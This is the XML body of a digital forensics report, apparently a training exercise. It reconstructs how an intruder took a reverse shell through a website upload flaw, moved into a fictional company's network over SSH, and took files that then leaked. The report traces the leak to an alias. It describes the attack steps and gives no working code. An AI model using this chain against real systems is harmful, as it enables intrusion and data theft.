        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="ffffff"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">report.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="000000" w:sz="2"/>
              <w:right w:val="single" w:color="000000" w:sz="2"/>
              <w:top w:val="single" w:color="ffffff"/>
              <w:bottom w:val="single" w:color="000000" w:sz="2"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Table Contents"/>
              <w:jc w:val="center"/>
              <w:spacing w:after="0"/>
              <w:spacing w:before="120"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">3744a2d1bf473c74f2f48dd3cca77cab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 1"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Can you establish a timeline of all relevant events that clarifies how the entire data exfiltration has taken place and the secrets ended up in Rick Chick's computers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s that lead us to this investigation were as following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">rst this unknown user with the ip 174.176.50.10 exploits XFarma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Website and gains access to Penelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Computer and XFarma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internal network through Penelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">allows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> him to re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">tre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">ive all the leaked files - xfarma-ce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">o-email.eml, cv.pdf, report.zip - to his own personal computer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">He then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">would have to come in contact with Rick Chick in order </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">for the files to end up in Rick</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Computer, so, we assume that this user went by the alias </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">N16H70WL and, after being contacted by Rick Chick, he </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">put all the files in a dropbox link and sent i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">t to Rick C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">ick throug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">h the found email: N16H70WL_services@protonmail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Then Rick Chick downloaded the fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">les from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">the dropbox link and leaked t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">he files to XFarma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Leak Website.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">So, in order, all that the user 174.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">6.50.10 did was:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">- Gets revers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">e shell from XFarma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Netw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">ork </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">exploiting and upload vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Nov  7, 2020 20:31:40.414069481 EST</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">- Finds all the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">working network including the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Gatewa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - [</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Nov  7, 2020 20:32:35.929285855 EST];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">- Logs in to Penelope</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Computer - [Nov  7, 2020 20:33:38.771144406 EST];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Retr</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ieves xf</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ar</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ma-ceo-email.eml - [Nov  7, 2020 20:34:10.012105381 EST];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">- Retrieves cv.pdf file - [Nov  7, 2020 20:34:34.112749814 EST];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">- Accesses XFarma</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Internal Networ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">k through Pe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">nelop</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account us</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ing </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">sh penelope@192.168.54.10</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">- [</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Nov  7, 2020 20:35:14.074958261 EST</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">- R</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">etrieves</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">r</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">eport.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">file from XF</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">arma</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Internal network - [Nov  7, 2020 20:35:54.939316981 EST</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">By now, this user has all the leaked files, so the next thing he did was probably come into contact with Rick Chick and uploaded the files into a dropbox link. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Rick Chick then d</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ownloads the files from the l</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ink and </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">keeps them in his persona</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">l computer, to then leak them through th</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">at website.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 1"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:bookmarkStart w:id="315" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="315"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">What can you tell about the identity of the person(s) responsible for leaking the secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
        <w:ind w:hanging="432"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ar-SA"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">After seeing that this “unknown user” with the ip 174.176.50.10 had accessed and retrieved the files present in Penelope’s Computer (xfarma-ceo-email.eml and cv.pdf) and in XFarma’s Internal Network (report.zip), and that these files were the same ones that were in the dropbox link through which Rick Chick downloaded the leaked files, we can safely confirm that this unknown user is the person that goes by the alias </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="20"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">N16H70WL with the email N16H70WL_services@protonmail.com.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Can also attach appendices, e.g., displaying relevant evidence, timelines, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="_Normal"/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:footerReference w:type="default" r:id="fId0"/>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:top="1440" w:left="1080" w:right="1080" w:bottom="1582"/>
    </w:sectPr>
  </w:body>
</w:document>
</file>

<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
<w:endnotes xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>
</file>

<file path=word/footer0.xml><?xml version="1.0" encoding="utf-8"?>
<w:ftr xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:p>
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:spacing w:after="0"/>
      <w:spacing w:before="120"/>
    </w:pPr>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
  </w:p>
</w:ftr>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2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num w:numId="120">
    <w:abstractNumId w:val="12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alloon Text">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:rFonts w:ascii="Lucida Grande" w:cs="Lucida Grande" w:hAnsi="Lucida Grande"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Balloon Text Char">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:rFonts w:ascii="Lucida Grande" w:cs="Lucida Grande" w:hAnsi="Lucida Grande"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Block Text">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:ind w:left="1440"/>
      <w:ind w:right="1440"/>
